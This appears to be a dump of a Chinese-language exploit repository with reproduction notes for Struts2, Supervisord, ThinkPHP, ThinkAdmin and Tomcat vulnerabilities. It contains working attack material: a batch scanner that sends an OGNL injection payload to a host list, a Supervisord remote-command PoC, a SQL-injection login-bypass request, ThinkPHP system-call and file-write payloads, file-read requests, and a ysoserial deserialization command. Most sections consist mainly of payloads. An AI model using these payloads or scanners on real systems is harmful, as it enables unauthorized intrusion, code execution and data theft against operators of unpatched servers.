https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Struts2/Struts2 S2-061远程代码执行漏洞(CVE-2020-17530)/6.png -------------------------------------------------------------------------------- /Struts2/Struts2 S2-061远程代码执行漏洞(CVE-2020-17530)/s2-061-batch-detect.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | 3 | import sys 4 | import requests 5 | import platform 6 | from bs4 import BeautifulSoup 7 | 8 | #统一URL格式,以“/”结尾 9 | def correct_url(host_file): 10 | with open(host_file, "r") as f: 11 | hosts = f.readlines(); 12 | correct_urls = []; 13 | for host in hosts: 14 | if platform.system() == "Linux": 15 | host = host.strip("\n"); 16 | if platform.system() == "Windows": 17 | host = host.strip("\r\n"); 18 | if host.endswith("/"): 19 | correct_urls.append(host); 20 | else: 21 | correct_urls.append(host + "/"); 22 | return correct_urls; 23 | 24 | #使用漏洞复现中的EXP1验证漏洞是否存在 25 | def vuln_detect(url): 26 | payload = "?id=%25%7b+%27test%27+%2b+(2000+%2b+20).toString()%7d"; 27 | full_url = url + payload; 28 | try: 29 | r = requests.get(full_url); 30 | if "test2020" in r.text: 31 | return "True"; 32 | else: 33 | return "False"; 34 | except requests.exceptions.ConnectionError: 35 | return "connection error"; 36 | except BaseException as e: 37 | return e; 38 | 39 | def main(): 40 | if len(sys.argv) == 2: 41 | host_file = sys.argv[1]; 42 | else: 43 | print("Usage: below example is from ubuntu"); 44 | print("Usage: python3 s2-061-batch-detect-exp.py hosts.txt"); 45 | exit(); 46 | 47 | #统一URL格式,以“/”结尾 48 | correct_urls = correct_url(host_file); 49 | 50 | with open("vulnerable.txt", "w") as f0: 51 | for url in correct_urls: 52 | result = vuln_detect(url); 53 | if result == "True": 54 | print(url + " is vulnerable"); 55 | if platform.system() == "Linux": 56 | f0.write(url + "\n"); 57 | if platform.system() == "Windows": 58 | f0.write(url + "\r\n"); 59 | elif result == "False": 60 | print(url + " is not vulnerable"); 61 | else: 62 | print(url + " " + result); 63 | print("The result has been output to the vulnerable.txt"); 64 | 65 | main(); -------------------------------------------------------------------------------- /Supervisord/Supervisord远程代码执行漏洞(CVE-2017-11610)/0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Supervisord/Supervisord远程代码执行漏洞(CVE-2017-11610)/0.png -------------------------------------------------------------------------------- /Supervisord/Supervisord远程代码执行漏洞(CVE-2017-11610)/poc.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | import xmlrpc.client 3 | import sys 4 | 5 | 6 | target = sys.argv[1] 7 | command = sys.argv[2] 8 | with xmlrpc.client.ServerProxy(target) as proxy: 9 | old = getattr(proxy, 'supervisor.readLog')(0,0) 10 | 11 | logfile = getattr(proxy, 'supervisor.supervisord.options.logfile.strip')() 12 | getattr(proxy, 'supervisor.supervisord.options.warnings.linecache.os.system')('{} | tee -a {}'.format(command, logfile)) 13 | result = getattr(proxy, 'supervisor.readLog')(0,0) 14 | 15 | print(result[len(old):]) 16 | -------------------------------------------------------------------------------- /Supervisord/Supervisord远程代码执行漏洞(CVE-2017-11610)/readme.md: -------------------------------------------------------------------------------- 1 | # 0x00 软件介绍 2 | Supervisord:一款python实现的进程管理程序 3 | 4 | # 0x01 复现环境 5 | 使用环境:vulhub中的环境 6 | 复现版本:无 7 | 8 | # 0x02 环境搭建 9 | 靶机环境:kali_x64_en-us 10 | 11 | cd vulhub/supervisor/CVE-2017-11610 12 | docker-compose up -d 13 | 14 | # 0x03 利用条件 15 | 无 16 | 17 | # 0x04 影响版本 18 | Supervisor 3.3.2 (2017-06-03) 19 | Supervisor 3.3.1 (2016-08-02) 20 | Supervisor 3.3.0 (2016-05-14) 21 | Supervisor 3.2.3 (2016-03-19) 22 | Supervisor 3.2.2 (2016-03-04) 23 | Supervisor 3.2.1 (2016-02-06) 24 | Supervisor 3.2.0 (2015-11-30) 25 | Supervisor 3.1.3 (2014-10-28) 26 | Supervisor 3.1.2 (2014-09-07) 27 | 28 | # 0x05 漏洞复现 29 | 攻击环境:kali_x64_en-us 30 | 31 | python3 ./poc.py "http://172.17.0.1:9001/RPC2" "id" 32 | 如下图 33 | ![image](./0.png) 34 | 35 | # 0x06 踩坑记录 36 | 无 37 | 38 | # 0x07 参考链接 39 | 无 40 | -------------------------------------------------------------------------------- /ThinkPHP/OneThink前台登录绕过.md: -------------------------------------------------------------------------------- 1 | ``` 2 | POST /admin/public/login.html HTTP/2 3 | Host: xxx.com 4 | Cookie: PHPSESSID=rj3bt9h5llepknii096h900ji4; onethink_admin___forward__=%2Fadmin%2Faddons%2Findex.html 5 | Content-Length: 38 6 | Sec-Ch-Ua: "Chromium";v="116", "Not)A;Brand";v="24", "Google Chrome";v="116" 7 | Accept: application/json, text/javascript, */*; q=0.01 8 | Content-Type: application/x-www-form-urlencoded; charset=UTF-8 9 | X-Requested-With: XMLHttpRequest 10 | Sec-Ch-Ua-Mobile: ?0 11 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 12 | Sec-Ch-Ua-Platform: "Windows" 13 | Sec-Fetch-Site: same-origin 14 | Sec-Fetch-Mode: cors 15 | Sec-Fetch-Dest: empty 16 | Accept-Encoding: gzip, deflate 17 | Accept-Language: zh-CN,zh;q=0.9 18 | 19 | username[]=like 1)and 1 in (2) union select 1,2,'',4,5,6,7,8,9,10,11%23&username[]=0&password=&verify=znjpu 20 | ``` -------------------------------------------------------------------------------- /ThinkPHP/ThinkAdmin列目录及任意文件读取漏洞(CVE-2020-25540)/0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/ThinkPHP/ThinkAdmin列目录及任意文件读取漏洞(CVE-2020-25540)/0.png -------------------------------------------------------------------------------- /ThinkPHP/ThinkAdmin列目录及任意文件读取漏洞(CVE-2020-25540)/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/ThinkPHP/ThinkAdmin列目录及任意文件读取漏洞(CVE-2020-25540)/1.png -------------------------------------------------------------------------------- /ThinkPHP/ThinkAdmin列目录及任意文件读取漏洞(CVE-2020-25540)/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/ThinkPHP/ThinkAdmin列目录及任意文件读取漏洞(CVE-2020-25540)/2.png -------------------------------------------------------------------------------- /ThinkPHP/ThinkAdmin列目录及任意文件读取漏洞(CVE-2020-25540)/readme.md: -------------------------------------------------------------------------------- 1 | # 0x00 软件介绍 2 | 基于ThinkPHP,专注于微信领域后台管理的一款开发框架 3 | 4 | # 0x01 复现环境 5 | 使用环境:本地搭建的环境 6 | 复现版本:2020.08.03.1之前的某一个v6版本:https://github.com/179776823/ThinkAdmin 7 | 8 | # 0x02 环境搭建 9 | 目标环境:2008_r2_standard_zh-chs + phpstudy + https://github.com/179776823/ThinkAdmin 10 | 11 | composer config -g repo.packagist composer https://mirrors.aliyun.com/composer #使用阿里云的源更快一些 12 | https://github.com/179776823/ThinkAdmin #下载有漏洞的v6版本到phpstudy的对应目录下 13 | cd ThinkAdmin 14 | composer install 15 | create database admin_v6; 16 | create user 'admin_v6'@'localhost' identified by 'FbYBHcWKr2';#用户名密码来自config\database.php 17 | grant all on admin_v6.* to 'admin_v6'@'localhost'; 18 | use admin_v6; 19 | source C:\phpstudy_pro\WWW\ThinkAdmin-6\admin_v6.sql;#将数据导入数据库 20 | 访问:http://127.0.0.1:81/ThinkAdmin-6/public/index.php 21 | 参考链接: 22 | https://mp.weixin.qq.com/s/MjU6u_eTsdH-nwQAgbxLRw 23 | https://thinkadmin.top/install 24 | https://www.cnblogs.com/Dot-Boy/archive/2008/08/04/1260185.html 25 | https://www.jianshu.com/p/d7b9c468f20d 26 | https://github.com/xuxuedong/personal-note/tree/master/2020_10_18_%E7%BD%91%E7%AB%99%E6%90%AD%E5%BB%BA%E4%BB%8E%E5%A4%B4%E8%AE%B0%E5%BD%95 27 | 28 | # 0x03 利用条件 29 | 无 30 | 31 | # 0x04 影响版本 32 | 漏洞发现者原话:2020.08.03.01,≤这个版本的都有可能存在漏洞 33 | 参考链接: 34 | https://github.com/zoujingli/ThinkAdmin/issues/244 35 | 36 | # 0x05 漏洞复现 37 | 攻击环境:Kali-Linux-2020.2-vmware-amd64 + Burp_Suite_Pro_v2020.5.1 38 | 39 | 列目录漏洞复现: 40 | 访问:http://192.168.149.133:81/ThinkAdmin-6/public/index.php/admin/login.html 41 | burp抓包,将数据包修改如下: 42 | ``` 43 | POST /ThinkAdmin-6/public/index.php/admin/login.html?s=admin/api.Update/node HTTP/1.1 44 | Host: 127.0.0.1 45 | Accept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) 46 | Connection: close 47 | Content-Type: application/x-www-form-urlencoded 48 | Content-Length: 22 49 | 50 | rules=%5B%22.%2F%22%5D 51 | ``` 52 | 成功列出了目录,如下图 53 | ![image](./0.png) 54 | 55 | 任意文件读取漏洞复现: 56 | 在网站根目录(C:\phpstudy_pro\WWW\ThinkAdmin-6\)下创建一个文件,名为1.txt,内容为:lalala 57 | 在攻击机的浏览器中访问:http://192.168.149.133:81/ThinkAdmin-6/public/index.php?s=admin/api.Update/get/encode/1d1a383c38 58 | 其中“1d1a383c38”是“1.txt”经下列函数编码后得到的 59 | ``` 60 | file_put_contents('test.php','') 31 | ``` 32 | 访问test.php,可以看到phpinfo已经加载出来 33 | ![image](./0.png) 34 | 35 | 任意文件包含漏洞复现: 36 | 浏览器访问 37 | ``` 38 | ?a=display&templateFile=README.md 39 | ``` 40 | 可以看到成功包含了README.md 41 | ![image](./1.png) 42 | 43 | # 0x06 踩坑记录 44 | 坑1: 45 | 搭建环境时,第三步报错,提示“thinkcmf 安装报错 Driver.class.php  LINE: 350”,执行“drop database thinkcmf”后,重新安装成功,原因未知 46 | 47 | # 0x07 参考链接 48 | 无 49 | -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP 3.2.x远程代码执行/image/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/ThinkPHP/ThinkPHP 3.2.x远程代码执行/image/01.png -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP 3.2.x远程代码执行/image/02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/ThinkPHP/ThinkPHP 3.2.x远程代码执行/image/02.png -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP 3.2.x远程代码执行/image/03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/ThinkPHP/ThinkPHP 3.2.x远程代码执行/image/03.png -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP 3.2.x远程代码执行/image/04.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/ThinkPHP/ThinkPHP 3.2.x远程代码执行/image/04.png -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP 3.2.x远程代码执行/readme.md: -------------------------------------------------------------------------------- 1 | # 0x01-漏洞浅析 2 | 该漏洞产生的根本原因是,在业务代码中对模板赋值方法assign的第一个参数传入携带攻击代码的路径,导致模板路径变量被覆盖为携带攻击代码路径,导致文件包含,进而代码执行 3 | 4 | # 0x02-影响版本 5 | 待测试 6 | 7 | # 0x03-环境搭建 8 | phpstudy8.1.1.3 + thinkphp3.2.3 9 | 搭建过程见:https://mp.weixin.qq.com/s/_4IZe-aZ_3O2PmdQrVbpdQ 10 | 11 | # 0x04-复现过程 12 | ``` 13 | GET /thinkphp-3.2.3/index.php?m=--> HTTP/1.1 14 | ``` 15 | ![image](./image/01.png) 16 | ![image](./image/02.png) 17 | ``` 18 | GET /thinkphp-3.2.3/index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Common/22_03_21.log HTTP/1.1 19 | ``` 20 | ![image](./image/03.png) 21 | ![image](./image/04.png) 22 | 23 | # 0x05-需要注意 24 | 暂无 -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP远程命令执行漏洞(暂无编号)/0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/ThinkPHP/ThinkPHP远程命令执行漏洞(暂无编号)/0.png -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP远程命令执行漏洞(暂无编号)/readme.md: -------------------------------------------------------------------------------- 1 | # 0x00 软件介绍 2 | ThinkPHP:一款在中国流行的php开发框架 3 | 4 | # 0x01 复现环境 5 | 使用环境:win10 x64 6 | 复现版本:ThinkPHP 5.0.22 7 | 8 | # 0x02 环境搭建 9 | 下载thinkphp_5.0.22_with_extend.zip 10 | 解压后访问http://127.0.0.1/thinkphp_5.0.22_with_extend/public/index.php 11 | 12 | # 0x03 利用条件 13 | 无 14 | 15 | # 0x04 影响版本 16 | ThinkPHP 5.0.0 ~ 5.0.23 17 | 18 | # 0x05 漏洞复现 19 | 攻击环境:win10 x64 20 | 21 | 攻击payload如下: 22 | ``` 23 | http://127.0.0.1/thinkphp_5.0.22_with_extend/public/index.php?s=captcha 24 | 25 | POST: 26 | 27 | _method=__construct&filter[]=system&method=get&get[]=whoami 28 | ``` 29 | 执行结果如下图 30 | ![image](./0.png) 31 | 32 | # 0x06 批量脚本 33 | 无 34 | 35 | # 0x07 踩坑记录 36 | 无 37 | 38 | # 0x08 参考链接 39 | https://xz.aliyun.com/t/3845 40 | -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP远程命令执行漏洞(暂无编号)/thinkphp版本总结.txt: -------------------------------------------------------------------------------- 1 | 截止到2021/01/03,不算Pre-release版本,5个系列全部版本如下: 2 | 3 | thinkphp 6.0.0-6.0.5 4 | thinkphp 5.1.0-5.1.40 5 | thinkphp 5.0.0-5.0.24 6 | thinkphp 3.2.0-3.2.5 7 | thinkphp 3.1.0-3.1.3 8 | -------------------------------------------------------------------------------- /Tomcat/Tomcat AJP本地文件包含漏洞(CNVD-2020-10487)/pic/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Tomcat/Tomcat AJP本地文件包含漏洞(CNVD-2020-10487)/pic/1.png -------------------------------------------------------------------------------- /Tomcat/Tomcat AJP本地文件包含漏洞(CNVD-2020-10487)/pic/readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Tomcat/Tomcat AJP本地文件包含漏洞(CNVD-2020-10487)/readme.md: -------------------------------------------------------------------------------- 1 | 当发现目标为tomcat应用服务器,且开启8009或类似的端口,可尝试tomcat ajp文件包含漏洞 2 | 3 | 借助工具:https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi/ 4 | 5 | 执行命令 6 | ``` 7 | python2 ./tool/CNVD-2020-10487-Tomcat-Ajp-lfi.py xx.xx.xx.xx -p 8443 -f WEB-INF/web.xml 8 | ``` 9 | 借用网图 10 | ![image](./pic/1.png) 11 | -------------------------------------------------------------------------------- /Tomcat/Tomcat JmxRemoteLifecycleListener远程代码执行漏洞(CVE-2016-8735)/a0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Tomcat/Tomcat JmxRemoteLifecycleListener远程代码执行漏洞(CVE-2016-8735)/a0.png -------------------------------------------------------------------------------- /Tomcat/Tomcat JmxRemoteLifecycleListener远程代码执行漏洞(CVE-2016-8735)/a1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Tomcat/Tomcat JmxRemoteLifecycleListener远程代码执行漏洞(CVE-2016-8735)/a1.png -------------------------------------------------------------------------------- /Tomcat/Tomcat JmxRemoteLifecycleListener远程代码执行漏洞(CVE-2016-8735)/a2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Tomcat/Tomcat JmxRemoteLifecycleListener远程代码执行漏洞(CVE-2016-8735)/a2.png -------------------------------------------------------------------------------- /Tomcat/Tomcat JmxRemoteLifecycleListener远程代码执行漏洞(CVE-2016-8735)/a3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Tomcat/Tomcat JmxRemoteLifecycleListener远程代码执行漏洞(CVE-2016-8735)/a3.png -------------------------------------------------------------------------------- /Tomcat/Tomcat JmxRemoteLifecycleListener远程代码执行漏洞(CVE-2016-8735)/a4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Tomcat/Tomcat JmxRemoteLifecycleListener远程代码执行漏洞(CVE-2016-8735)/a4.png -------------------------------------------------------------------------------- /Tomcat/Tomcat JmxRemoteLifecycleListener远程代码执行漏洞(CVE-2016-8735)/catalina-jmx-remote.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Tomcat/Tomcat JmxRemoteLifecycleListener远程代码执行漏洞(CVE-2016-8735)/catalina-jmx-remote.jar -------------------------------------------------------------------------------- /Tomcat/Tomcat JmxRemoteLifecycleListener远程代码执行漏洞(CVE-2016-8735)/groovy-2.3.9.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Tomcat/Tomcat JmxRemoteLifecycleListener远程代码执行漏洞(CVE-2016-8735)/groovy-2.3.9.jar -------------------------------------------------------------------------------- /Tomcat/Tomcat JmxRemoteLifecycleListener远程代码执行漏洞(CVE-2016-8735)/readme.md: -------------------------------------------------------------------------------- 1 | # 0x00 软件介绍 2 | Tomcat:一款流行的java web应用服务器 3 | 4 | # 0x01 复现环境 5 | 使用环境:本地搭建的环境 6 | 复现版本:Apache Tomcat 8.0.36 7 | 8 | # 0x02 环境搭建 9 | 靶机环境:win7_ult_x64_zh-chs 10 | 11 | 下载并解压apache-tomcat-8.0.36.zip 12 | 下载并安装jdk-7u79-windows-x64.exe 13 | 配置环境变量JAVA_HOME(这里有一点需要注意:配置环境变量JAVA_HOME前也可在cmd.exe下执行“java.exe -version”,原因是jdk安装完毕后会自动将java.exe及相关文件拷贝到c:\windows\system32\下) 14 | 在conf/server.xml中添加以下语句 15 | ``` 16 | 17 | ``` 18 | ![image](./a0.png) 19 | 然后下载catalina-jmx-remote.jar包和groovy-2.3.9.jar包,放到tomcat的lib目录下 20 | 注意: 21 | 1、下载的catalina-jmx-remote.jar要与对应tomcat版本一致,一般这个jar包的下载地址位于官方tomcat下载目录的extras文件夹里 22 | 2、下载groovy,版本最好为2.3.9,官网已经不提供下载了,附上下载地址:https://mvnrepository.com/artifact/org.codehaus.groovy/groovy/2.3.9 23 | 接着修改bin/catalina.bat,在Execute The Requested Command上面添加 24 | ``` 25 | set CATALINA_OPTS=-Dcom.sun.management.jmxremote.ssl=false -Dcom.sun.management.jmxremote.authenticate=false 26 | ``` 27 | -Dcom.sun.management.jmxremote.ssl=false 指定是否使用SSL通讯 28 | -Dcom.sun.management.jmxremote.authenticate=false 指定是否需要密码验证 29 | ![image](./a1.png) 30 | 最后运行bin/startup.bat启动tomcat! 31 | ![image](./a2.png) 32 | 查看目标是否启动了JmxRemoteLifecycleListener,即是否监听端口10001,10002,经查看,已启动 33 | ![image](./a3.png) 34 | 35 | # 0x03 利用条件 36 | 目标是否启动了JmxRemoteLifecycleListener,即是否监听端口10001,10002 37 | 38 | # 0x04 影响版本 39 | Apache Tomcat 9.0.0.M1 to 9.0.0.M11 40 | Apache Tomcat 8.5.0 to 8.5.6 41 | Apache Tomcat 8.0.0.RC1 to 8.0.38 42 | Apache Tomcat 7.0.0 to 7.0.72 43 | Apache Tomcat 6.0.0 to 6.0.47 44 | 45 | # 0x05 漏洞复现 46 | 攻击环境:Kali-Linux-2020.2-vmware-amd64 47 | 48 | 下载ysoserial,执行 49 | ``` 50 | java -cp ./ysoserial-master-6eca5bc740-1.jar ysoserial.exploit.RMIRegistryExploit 192.168.149.134 10001 Groovy1 calc.exe 51 | ``` 52 | 可以看到靶机上弹出了计算器 53 | ![image](./a4.png) 54 | 55 | # 0x06 踩坑记录 56 | 坑1: 57 | tomcat相同版本,在java 1.8.0_131下无法弹出计算机。觉得这个漏洞应该还和java版本有关。和groovy版本也有关 58 | 59 | # 0x07 参考链接 60 | https://blog.csdn.net/littlehaes/article/details/104451590 61 | https://gv7.me/articles/2018/CVE-2016-8735/ 62 | https://github.com/frohoff/ysoserial 63 | http://cn.voidcc.com/question/p-zmdzyjue-bbh.html 64 | -------------------------------------------------------------------------------- /Tomcat/Tomcat WebSocket拒绝服务漏洞(CVE-2020-13935)/WebSocketClient.js: -------------------------------------------------------------------------------- 1 | class WebSocketClient { 2 | 3 | constructor(protocol, hostname, port, endpoint) { 4 | 5 | this.webSocket = null; 6 | 7 | this.protocol = protocol; 8 | this.hostname = hostname; 9 | this.port = port; 10 | this.endpoint = endpoint; 11 | } 12 | 13 | getServerUrl() { 14 | return this.protocol + "://" + this.hostname + ":" + this.port + this.endpoint; 15 | } 16 | 17 | connect() { 18 | try { 19 | this.webSocket = new WebSocket(this.getServerUrl()); 20 | 21 | // 22 | // Implement WebSocket event handlers! 23 | // 24 | this.webSocket.onopen = function(event) { 25 | console.log('onopen::' + JSON.stringify(event, null, 4)); 26 | } 27 | 28 | this.webSocket.onmessage = function(event) { 29 | var msg = event.data; 30 | console.log('onmessage::' + JSON.stringify(msg, null, 4)); 31 | } 32 | this.webSocket.onclose = function(event) { 33 | console.log('onclose::' + JSON.stringify(event, null, 4)); 34 | } 35 | this.webSocket.onerror = function(event) { 36 | console.log('onerror::' + JSON.stringify(event, null, 4)); 37 | } 38 | 39 | } catch (exception) { 40 | console.error(exception); 41 | } 42 | } 43 | 44 | getStatus() { 45 | return this.webSocket.readyState; 46 | } 47 | 48 | send(message) { 49 | 50 | if (this.webSocket.readyState == WebSocket.OPEN) { 51 | this.webSocket.send(message); 52 | 53 | } else { 54 | console.error('webSocket is not open. readyState=' + this.webSocket.readyState); 55 | } 56 | } 57 | 58 | disconnect() { 59 | if (this.webSocket.readyState == WebSocket.OPEN) { 60 | this.webSocket.close(); 61 | 62 | } else { 63 | console.error('webSocket is not open. readyState=' + this.webSocket.readyState); 64 | } 65 | } 66 | } 67 | 68 | var client = new WebSocketClient('ws', '172.16.35.133', 8080, '/DemoOne/endpoint'); 69 | 70 | client.connect(); 71 | -------------------------------------------------------------------------------- /Tomcat/Tomcat WebSocket拒绝服务漏洞(CVE-2020-13935)/WebSocketServlet.java: -------------------------------------------------------------------------------- 1 | package com.pegaxchange.java.web; 2 | 3 | import java.io.IOException; 4 | import java.util.List; 5 | import java.util.Map; 6 | 7 | import javax.websocket.OnClose; 8 | import javax.websocket.OnError; 9 | import javax.websocket.OnMessage; 10 | import javax.websocket.OnOpen; 11 | import javax.websocket.Session; 12 | import javax.websocket.server.ServerEndpoint; 13 | 14 | @ServerEndpoint("/endpoint") 15 | public class WebSocketServlet { 16 | 17 | @OnOpen 18 | public void onOpen(Session session) { 19 | System.out.println( "onOpen::" + session.getId() ); 20 | } 21 | 22 | @OnClose 23 | public void onClose(Session session) { 24 | System.out.println( "onClose::" + session.getId() ); 25 | } 26 | 27 | @OnMessage 28 | public void onMessage(String message, Session session) { 29 | System.out.println("onMessage::From=" + session.getId() + " Message=" + message); 30 | try { 31 | session.getBasicRemote().sendText("Hello Client " + session.getId() + "!"); 32 | } catch (IOException e) { 33 | e.printStackTrace(); 34 | } 35 | } 36 | 37 | @OnError 38 | public void onError(Throwable t) { 39 | System.out.println("onError::" + t.getMessage()); 40 | } 41 | } -------------------------------------------------------------------------------- /Tomcat/Tomcat WebSocket拒绝服务漏洞(CVE-2020-13935)/a.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Tomcat/Tomcat WebSocket拒绝服务漏洞(CVE-2020-13935)/a.png -------------------------------------------------------------------------------- /Tomcat/Tomcat WebSocket拒绝服务漏洞(CVE-2020-13935)/a0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Tomcat/Tomcat WebSocket拒绝服务漏洞(CVE-2020-13935)/a0.png -------------------------------------------------------------------------------- /Tomcat/Tomcat WebSocket拒绝服务漏洞(CVE-2020-13935)/a1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Tomcat/Tomcat WebSocket拒绝服务漏洞(CVE-2020-13935)/a1.png -------------------------------------------------------------------------------- /Tomcat/Tomcat WebSocket拒绝服务漏洞(CVE-2020-13935)/a2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Tomcat/Tomcat WebSocket拒绝服务漏洞(CVE-2020-13935)/a2.png -------------------------------------------------------------------------------- /Tomcat/Tomcat WebSocket拒绝服务漏洞(CVE-2020-13935)/a3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Tomcat/Tomcat WebSocket拒绝服务漏洞(CVE-2020-13935)/a3.png -------------------------------------------------------------------------------- /Tomcat/Tomcat WebSocket拒绝服务漏洞(CVE-2020-13935)/b.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Tomcat/Tomcat WebSocket拒绝服务漏洞(CVE-2020-13935)/b.png -------------------------------------------------------------------------------- /Tomcat/Tomcat WebSocket拒绝服务漏洞(CVE-2020-13935)/c.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Tomcat/Tomcat WebSocket拒绝服务漏洞(CVE-2020-13935)/c.png -------------------------------------------------------------------------------- /Tomcat/Tomcat WebSocket拒绝服务漏洞(CVE-2020-13935)/d.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Tomcat/Tomcat WebSocket拒绝服务漏洞(CVE-2020-13935)/d.png -------------------------------------------------------------------------------- /Tomcat/Tomcat WebSocket拒绝服务漏洞(CVE-2020-13935)/e.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Tomcat/Tomcat WebSocket拒绝服务漏洞(CVE-2020-13935)/e.png -------------------------------------------------------------------------------- /Tomcat/Tomcat WebSocket拒绝服务漏洞(CVE-2020-13935)/f.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Tomcat/Tomcat WebSocket拒绝服务漏洞(CVE-2020-13935)/f.png -------------------------------------------------------------------------------- /Tomcat/Tomcat WebSocket拒绝服务漏洞(CVE-2020-13935)/readme.md: -------------------------------------------------------------------------------- 1 | # 0x00 软件介绍 2 | Tomcat:一款流行的java web应用服务器 3 | 4 | # 0x01 复现环境 5 | 使用环境:本地搭建的环境 6 | 复现版本:apache-tomcat-8.5.56 7 | 8 | # 0x02 环境搭建 9 | 靶机系统:2008_r2_standard_zh-chs 10 | 11 | 下载并解压apache-tomcat-8.5.56 12 | 进入目录bin并执行startup.bat,出现“Server startup in xx ms”,通常表示启动成功,如下图 13 | ![image](./a.png) 14 | 访问[http://172.16.35.133:8080/](http://172.16.35.133:8080/),确认服务成功启动,如下图 15 | ![image](./b.png) 16 | 接下来需要操作如下8个步骤: 17 | 1、JDK安装配置 18 | 2、Apache Tomcat安装配置 19 | 3、Eclipse IDE for Java EE安装配置 20 | 4、Tomcat运行时环境在Eclipse IDE for Java EE中配置 21 | 5、Eclipse中建立动态web项目 22 | 6、创建"Hello World" Servlet和JSP视图 23 | 7、在Eclipse中运行动态web项目 24 | 8、导出为WAR文件并部署到Tomcat中 25 | 写好的websocket应用见文件WebSocketServlet.java,部署好的websocket应用见下图 26 | ![image](./a0.png) 27 | 在火狐浏览器的开发者工具的控制台中依次执行WebSocketClient.js中的javascript代码,当执行完“client.connect();”,eclipse中tomcat控制台出现“onOpen::0”时,表示websocket应用部署成功,如下图 28 | ![image](./a1.png) 29 | 导出为DemoTwo.war并部署到tomcat中 30 | 31 | # 0x03 利用条件 32 | Tomcat上部署了WebSocket应用 33 | 34 | # 0x04 影响版本 35 | 9.0.0.M1 <= apache tomcat <= 9.0.36 36 | 10.0.0-M1 <= apache tomcat <= 10.0.0-M6 37 | 8.5.0 <= apache tomcat <= 8.5.56 38 | 7.0.27 <= apache tomcat <= 7.0.104 39 | 40 | # 0x05 漏洞复现 41 | 